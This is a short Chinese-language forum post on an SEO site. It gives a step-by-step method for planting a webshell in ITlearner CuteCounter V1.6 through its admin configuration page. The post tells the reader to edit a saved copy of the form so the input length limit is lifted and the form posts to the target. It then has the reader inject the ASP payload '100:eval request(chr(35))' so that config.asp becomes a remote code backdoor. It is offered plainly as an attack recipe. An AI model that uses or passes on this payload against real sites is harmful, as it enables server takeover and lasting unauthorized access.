设为首页收藏本站电话:0551-62380569
切换到宽版

网站推广-网站优化-合肥久飞SEO论坛

 找回密码
 立即注册

QQ登录

只需一步,快速开始

网站推广-网站优化-合肥久飞SEO论坛»论坛首页 资源分享互助 服务器搭建相关 ITlearner CuteCounter V1.6后台获得webshell
返回列表 发新帖
查看: 181|回复: 0

ITlearner CuteCounter V1.6后台获得webshell

[复制链接]
晓晓
发表于 2008-10-22 00:34:39 | 显示全部楼层 |阅读模式
进入http://url/admin.asp?action=ShowConfig,查看原代码

查找<td><input name=\"RecordNum\" type=\"text\" id=\"RecordNum\" value=\"100\" size=\"40\" maxlength=\"3\"></td>

修改maxlength=\"3\"为maxlength=\"50\">

然后查找 <form name=\"form1\" method=\"post\" action=\"?Action=SaveConfig\">处

修改为action=\"http://url/admin?Action=SaveConfig\">

存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35))

此处没有哪个\"的然后保存设置后提示成功后

用海洋eval连接http://url/config.asp文件就获得一个webshell!
CuteCounter, ITlearner, Webshell, 后台

本文地址: https://jiufei.net/bbs/thread-481-1-1.html

相关帖子
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|手机版|小黑屋|合肥网站优化,合肥百度优化,合肥网络推广,合肥SEO优化论坛 ( 皖ICP备2022014487号-2 )

GMT+8, 2025-1-31 11:05 , Processed in 0.143421 second(s), 19 queries , File On.

Powered by jiufei X3.4

© 2008-2020 www.jiufei.net

快速回复 返回顶部 返回列表